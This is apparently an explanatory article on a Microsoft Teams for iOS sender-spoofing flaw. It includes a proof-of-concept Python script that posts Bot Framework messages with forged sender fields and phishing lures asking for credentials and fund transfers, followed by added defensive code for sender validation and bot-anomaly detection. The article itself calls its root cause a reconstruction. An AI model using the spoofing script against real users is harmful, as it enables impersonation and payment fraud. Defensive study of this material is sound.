CVE-2024-38197 - Microsoft Teams for iOS Spoofing Vulnerability – Deep Dive and Exploit Guide

Microsoft Teams is a central tool in many workplaces, so its security is a top concern. In August 2024, Microsoft disclosed a spoofing vulnerability in Microsoft Teams for iOS: CVE-2024-38197. The flaw lets an attacker make a message appear to come from someone other than its real sender, undermining the trust organizations place in internal communication. In this long read we break down what is known about the bug, walk through a plausible attack chain with code snippets, and discuss mitigation.

What Is CVE-2024-38197?

CVE-2024-38197 is categorized as a spoofing vulnerability in the iOS version of the Microsoft Teams mobile app. Under certain conditions, an attacker can cause Teams to display a message as if it came from someone else. Because the forged sender looks like a trusted colleague, the bug is a natural lever for phishing, leakage of sensitive data, or malware distribution among users who trust each other.

Official advisory: MSRC CVE-2024-38197

How the Teams Spoofing Works

The mobile client renders sender metadata (display name, avatar, identifiers) that arrives alongside the message body. The model of the bug presented here is that the iOS client trusted sender fields carried in a crafted message (sent with external tooling or through a compromised bot) instead of the identity the service had authenticated, so the "from" field could be falsified. Microsoft's advisory does not publish the root cause, so what follows is a reconstruction rather than a confirmed description of the flaw.

Attack Vector

1. The attacker controls a bot or Teams webhook, or intercepts a message delivery channel (e.g., MITM on a Wi-Fi network).

2. The attacker crafts a payload in which the sender's identifier and display name are falsified.

3. Inside the Teams mobile app the message appears to come from a trusted source, but it was in fact sent by the attacker.

Why Only iOS?

Microsoft scopes the issue to the iOS client, which implies that the iOS app processed the relevant sender fields differently from the Android and web clients (which evidently did not honour them). The exact difference has not been published, but the practical consequence is that the same crafted message is only rendered with the forged sender on iOS devices.

Proof-of-Concept Exploit

> ⚠️ For educational purposes only! Do not use this information for unauthorized attacks.

Suppose you operate a Teams webhook or bot in a test environment. Here’s how you can send a spoofed message:

1. Add an "Incoming Webhook" connector to your Teams channel.

2. Copy the webhook URL (e.g., https://outlook.office.com/webhook/...).

3. Microsoft Teams webhooks accept JSON payloads like:

{
  "text": "This is a normal message."
}

For this exploit, alter the payload:

{
  "text": "Hey, can you urgently send the client credentials?",
  "title": "From: Alice Smith (CFO)",
  "summary": "Spoofed message"
}

Teams does not treat "title" as the sender: it is rendered as a card title on every client, and the displayed sender of a webhook message is always the connector itself. The attack described here therefore targets the Bot Framework activity instead, which carries an explicit from field that the iOS client is assumed to trust:

{
  "type": "message",
  "from": {
    "id": "12345", 
    "name": "Alice Smith",
    "aadObjectId": "spoofed-user-guid"
  },
  "text": "Please transfer the funds to account #123456789."
}

Send this via the Microsoft Bot Framework REST API (the connector's "send to conversation" endpoint, POST {serviceUrl}/v3/conversations/{conversationId}/activities).

Code Snippet (Python)

import requests

# Connector service URL for the tenant's region and the target conversation.
# Both values come from an activity the bot previously received in that chat.
service_url = "https://smba.trafficmanager.net/amer"
conversation_id = "<conversation_id>"
url = f"{service_url}/v3/conversations/{conversation_id}/activities"

headers = {
    # Access token obtained for the attacker-controlled bot's app registration.
    "Authorization": "Bearer <bot_access_token>",
    "Content-Type": "application/json",
}

payload = {
    "type": "message",
    # Forged sender fields. The bot's real identity is established by the
    # token above; a correct client ignores this block when choosing what to display.
    "from": {
        "id": "12345",
        "name": "Alice Smith"
    },
    "text": "Your urgent response is needed."
}

r = requests.post(url, headers=headers, json=payload, timeout=10)
print(r.status_code, r.text)

> In the scenario described above, the Teams for iOS client shows this message as coming from "Alice Smith," even though it was sent by the attacker's bot account. A client that binds the displayed sender to the identity authenticated by the service shows the bot instead.
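The difference between the vulnerable and the correct behaviour comes down to where the client takes the sender identity from. The following is an added example, not code from the article or from Microsoft: a minimal model of a chat client's sender-rendering step, with a variant that trusts the message body (the behaviour the attack relies on) beside a hardened variant that displays the identity the service authenticated from the bot's bearer token and flags a disagreeing body. The bot identity, the "[APP]" label and both activity payloads are constructed for illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AuthenticatedSender:
    """Identity the messaging service established when it accepted the
    message (from the bearer token the bot presented), independent of
    anything carried in the message body."""
    principal_id: str    # e.g. "28:<bot app id>" for a Bot Framework bot
    display_name: str    # name registered for that principal
    is_bot: bool


# Constructed: the bot that actually authenticated to the connector API.
PAYROLL_BOT = AuthenticatedSender("28:bot-app-7f3a", "Payroll Helper", True)

# Constructed: an honest activity from that bot.
LEGIT_ACTIVITY = {
    "type": "message",
    "from": {"id": "28:bot-app-7f3a", "name": "Payroll Helper"},
    "text": "Payslips for August are available.",
}

# Constructed: the payload shape used in the article, sent by the same bot.
SPOOFED_ACTIVITY = {
    "type": "message",
    "from": {"id": "12345", "name": "Alice Smith",
             "aadObjectId": "spoofed-user-guid"},
    "text": "Please transfer the funds to account #123456789.",
}


def render_sender_vulnerable(activity: dict) -> str:
    """Trusts the body. Any client doing this displays whatever name the
    sender chose to put in the activity."""
    return activity["from"]["name"]


def render_sender_hardened(activity: dict, auth: AuthenticatedSender) -> dict:
    """Displays the authenticated identity and reports which body fields
    disagree with it, so the UI can warn or the server can drop the message."""
    claimed = activity.get("from") or {}
    mismatched = []
    if claimed.get("id") != auth.principal_id:
        mismatched.append("id")
    if claimed.get("name") != auth.display_name:
        mismatched.append("name")
    # A bot is not a directory user; a body that claims a user object id
    # while the token belongs to a bot is a forgery signal on its own.
    if auth.is_bot and claimed.get("aadObjectId"):
        mismatched.append("aadObjectId")
    # Illustrative tag so a human can tell an app from a colleague at a glance.
    label = auth.display_name + (" [APP]" if auth.is_bot else "")
    return {
        "display_name": label,
        "suspicious": bool(mismatched),
        "mismatched_fields": mismatched,
        "claimed_name": claimed.get("name"),
    }


if __name__ == "__main__":
    print("vulnerable:", render_sender_vulnerable(SPOOFED_ACTIVITY))
    print("hardened:  ", render_sender_hardened(SPOOFED_ACTIVITY, PAYROLL_BOT))
```

The hardened path never consults the body to decide what name to show; the body's fields are only compared against the authenticated identity to produce a signal. That is the property the iOS client is assumed to have lacked.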

Real-World Impact

- Business Email Compromise (BEC): impersonating executives to request wire transfers or other sensitive actions.

Mitigation

- Update Teams for iOS to the patched build from the App Store (see the official advisory below).

- Monitor access logs for anomalous bot activity, in particular messages whose claimed sender differs from the bot that authenticated to send them.
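"Anomalous bot activity" is easier to act on when written down as rules. The block below is an added example (not from the article or from Microsoft) of detection logic for that advice, run over constructed records. The record schema is an assumption modelled on what an audit export of bot-sent messages would carry (the authenticated app id, the sender fields claimed in the body, conversation and text); the directory, bot registry and log records are all constructed, and the field names should be mapped onto whatever your real log source provides.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed: display names of real users in the tenant, with object ids.
DIRECTORY = {
    "Alice Smith": "0f1e2d3c-aaaa-4bbb-8ccc-000000000001",
    "Bob Jones": "0f1e2d3c-aaaa-4bbb-8ccc-000000000002",
}

# Constructed: bot app ids allowed to post, with their registered names.
REGISTERED_BOTS = {"bot-app-7f3a": "Payroll Helper"}

# Constructed audit records. auth_app_id is the identity behind the bearer
# token; claimed_* are the fields the activity body asserted.
RECORDS = [
    {"ts": "2024-08-14T09:00:01Z", "auth_app_id": "bot-app-7f3a",
     "claimed_id": "28:bot-app-7f3a", "claimed_name": "Payroll Helper",
     "claimed_aad": None, "conversation": "19:team-a",
     "text": "Payslips are ready."},
    {"ts": "2024-08-14T09:02:10Z", "auth_app_id": "bot-app-7f3a",
     "claimed_id": "12345", "claimed_name": "Alice Smith",
     "claimed_aad": "spoofed-user-guid", "conversation": "19:team-a",
     "text": "Please transfer the funds to account #123456789."},
    {"ts": "2024-08-14T09:03:00Z", "auth_app_id": "bot-app-7f3a",
     "claimed_id": "12346", "claimed_name": "Bob Jones",
     "claimed_aad": None, "conversation": "19:team-a",
     "text": "Your urgent response is needed."},
    {"ts": "2024-08-14T09:03:30Z", "auth_app_id": "unknown-app-9911",
     "claimed_id": "28:unknown-app-9911", "claimed_name": "Helpdesk",
     "claimed_aad": None, "conversation": "19:team-b", "text": "Hi"},
]


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect_bot_sender_anomalies(records, directory=DIRECTORY,
                                bots=REGISTERED_BOTS,
                                window=timedelta(minutes=10)):
    """Return one alert dict per rule hit. Rules:
    unregistered-app             token belongs to no approved bot
    impersonates-directory-user  body name is a real user's name
    sender-name-mismatch         body name differs from the registered name
    bot-claims-user-object-id    a bot asserted an aadObjectId
    many-sender-names-in-window  one bot used 3+ names within `window`
    """
    alerts = []
    recent = defaultdict(list)  # app id -> [(time, claimed_name)] in window

    def alert(r, rule):
        alerts.append({"ts": r["ts"], "rule": rule, "app": r["auth_app_id"],
                       "claimed_name": r["claimed_name"],
                       "conversation": r["conversation"]})

    for r in sorted(records, key=lambda x: x["ts"]):
        app, name, now = r["auth_app_id"], r["claimed_name"], _ts(r["ts"])
        registered = bots.get(app)
        if registered is None:
            alert(r, "unregistered-app")
            continue
        if name != registered:
            alert(r, "impersonates-directory-user" if name in directory
                  else "sender-name-mismatch")
        if r.get("claimed_aad"):
            alert(r, "bot-claims-user-object-id")
        # Sliding window of names this bot has posted under.
        hist = [(t, n) for t, n in recent[app] if now - t <= window]
        hist.append((now, name))
        recent[app] = hist
        if len({n for _, n in hist}) == 3:   # fire once, on the third name
            alert(r, "many-sender-names-in-window")
    return alerts


if __name__ == "__main__":
    for a in detect_bot_sender_anomalies(RECORDS):
        print(a["ts"], a["rule"], a["app"], repr(a["claimed_name"]))
```

The first rule is the cheapest and strongest: a bot whose claimed display name matches a real directory user has no legitimate reason to exist, regardless of which client renders it. The windowed rule catches a bot cycling through names even when none of them collides with the directory.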

Official remediation & FAQ:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38197

- MSRC CVE-2024-38197 (Microsoft Advisory): https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38197
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2024-38197
- Microsoft Teams Developer Docs

*Exclusive take: CVE-2024-38197 highlights how a lapse in client-side validation—even in a trusted mobile app—can be exploited in clever ways, especially as more attacks move to collaboration platforms. Always update apps, and treat unusual requests with suspicion no matter how familiar the sender looks.*

Timeline

Published on: 08/13/2024 18:15:28 UTC
Last modified on: 10/22/2024 19:50:21 UTC